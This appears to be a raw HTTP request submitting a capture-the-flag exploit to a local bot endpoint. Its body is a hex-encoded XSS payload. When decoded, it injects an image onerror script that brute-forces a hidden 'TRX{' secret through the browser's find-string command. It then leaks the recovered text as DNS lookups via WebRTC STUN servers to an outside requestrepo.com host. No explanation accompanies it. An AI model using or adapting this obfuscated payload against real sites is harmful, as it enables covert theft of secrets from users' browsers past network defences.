POST /visit HTTP/1.1
Host: localhost:1337
Content-Type: application/json
sec-ch-ua: "Chromium";v="133", "Not(A:Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Accept-Language: it-IT,it;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
If-None-Match: W/"605-TuXniSNaFswD+l199u4P6+n5I8c"
Connection: keep-alive
Content-Length: 2789

{
"payload": "\\x3c\\x69\\x6d\\x67\\x20\\x73\\x72\\x63\\x3d\\x22\\x23\\x22\\x20\\x6f\\x6e\\x65\\x72\\x72\\x6f\\x72\\x3d\\x27\\x28\\x28\\x29\\x3d\\x3e\\x7b\\x6c\\x65\\x74\\x20\\x6f\\x3d\\x22\\x54\\x52\\x58\\x7b\\x22\\x3b\\x76\\x61\\x72\\x20\\x72\\x3d\\x22\\x61\\x62\\x63\\x64\\x65\\x66\\x67\\x68\\x69\\x6a\\x6b\\x6c\\x6d\\x6e\\x6f\\x70\\x71\\x72\\x73\\x74\\x75\\x76\\x77\\x78\\x79\\x7a\\x30\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x5f\\x7b\\x7d\\x22\\x3b\\x66\\x6f\\x72\\x28\\x6c\\x65\\x74\\x20\\x65\\x3d\\x30\\x3b\\x65\\x3c\\x31\\x32\\x38\\x3b\\x65\\x2b\\x2b\\x29\\x66\\x6f\\x72\\x28\\x76\\x61\\x72\\x20\\x74\\x20\\x69\\x6e\\x20\\x72\\x29\\x72\\x65\\x73\\x3d\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74\\x2e\\x65\\x78\\x65\\x63\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x28\\x22\\x66\\x69\\x6e\\x64\\x73\\x74\\x72\\x69\\x6e\\x67\\x22\\x2c\\x21\\x31\\x2c\\x6f\\x2b\\x72\\x5b\\x74\\x5d\\x29\\x2c\\x72\\x65\\x73\\x26\\x26\\x28\\x6f\\x2b\\x3d\\x72\\x5b\\x74\\x5d\\x29\\x3b\\x66\\x6f\\x72\\x28\\x6c\\x65\\x74\\x20\\x65\\x3d\\x30\\x3b\\x65\\x3c\\x6f\\x2e\\x6c\\x65\\x6e\\x67\\x74\\x68\\x3b\\x65\\x2b\\x3d\\x34\\x29\\x7b\\x76\\x61\\x72\\x20\\x6e\\x3d\\x6f\\x2e\\x73\\x75\\x62\\x73\\x74\\x72\\x69\\x6e\\x67\\x28\\x65\\x2c\\x65\\x2b\\x34\\x29\\x3b\\x63\\x6f\\x6e\\x73\\x6f\\x6c\\x65\\x2e\\x6c\\x6f\\x67\\x28\\x6e\\x29\\x3b\\x6c\\x65\\x74\\x20\\x72\\x3d\\x6e\\x65\\x77\\x20\\x52\\x54\\x43\\x50\\x65\\x65\\x72\\x43\\x6f\\x6e\\x6e\\x65\\x63\\x74\\x69\\x6f\\x6e\\x28\\x7b\\x69\\x63\\x65\\x53\\x65\\x72\\x76\\x65\\x72\\x73\\x3a\\x5b\\x7b\\x75\\x72\\x6c\\x73\\x3a\\x5b\\x22\\x73\\x74\\x75\\x6e\\x3a\\x22\\x2b\\x66\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e\\x28\\x72\\x29\\x7b\\x6c\\x65\\x74\\x20\\x6f\\x3d\\x22\\x22\\x3b\\x66\\x6f\\x72\\x28\\x6c\\x65\\x74\\x20\\x65\\x3d\\x30\\x3b\\x65\\x3c\\x72\\x2e\\x6c\\x65\\x6e\\x67\\x74\\x68\\x3b\\x65\\x2b\\x2b\\x29\\x6f\\x2b\\x3d\\x72\\x2e\\x63\\x68\\x61\\x72\\x43\\x6f\\x64\\x65\\x41\\x74\\x28\\x65\\x29\\x2e\\x74\\x6f\\x53\\x74\\x72\\x69\\x6e\\x67\\x28\\x31\\x36\\x29\\x3b\\x72\\x65\\x74\\x75\\x72\\x6e\\x20\\x6f\\x7d\\x28\\x6e\\x29\\x2b\\x22\\x2e\\x22\\x2b\\x65\\x2b\\x22\\x2e\\x63\\x75\\x64\\x32\\x6c\\x33\\x6e\\x6b\\x2e\\x72\\x65\\x71\\x75\\x65\\x73\\x74\\x72\\x65\\x70\\x6f\\x2e\\x63\\x6f\\x6d\\x22\\x5d\\x7d\\x5d\\x7d\\x29\\x3b\\x72\\x2e\\x63\\x72\\x65\\x61\\x74\\x65\\x4f\\x66\\x66\\x65\\x72\\x28\\x7b\\x6f\\x66\\x66\\x65\\x72\\x54\\x6f\\x52\\x65\\x63\\x65\\x69\\x76\\x65\\x41\\x75\\x64\\x69\\x6f\\x3a\\x31\\x7d\\x29\\x2e\\x74\\x68\\x65\\x6e\\x28\\x65\\x3d\\x3e\\x72\\x2e\\x73\\x65\\x74\\x4c\\x6f\\x63\\x61\\x6c\\x44\\x65\\x73\\x63\\x72\\x69\\x70\\x74\\x69\\x6f\\x6e\\x28\\x65\\x29\\x29\\x2e\\x63\\x61\\x74\\x63\\x68\\x28\\x65\\x3d\\x3e\\x63\\x6f\\x6e\\x73\\x6f\\x6c\\x65\\x2e\\x65\\x72\\x72\\x6f\\x72\\x28\\x65\\x29\\x29\\x7d\\x7d\\x29\\x28\\x29\\x3b\\x27\\x3e"
}
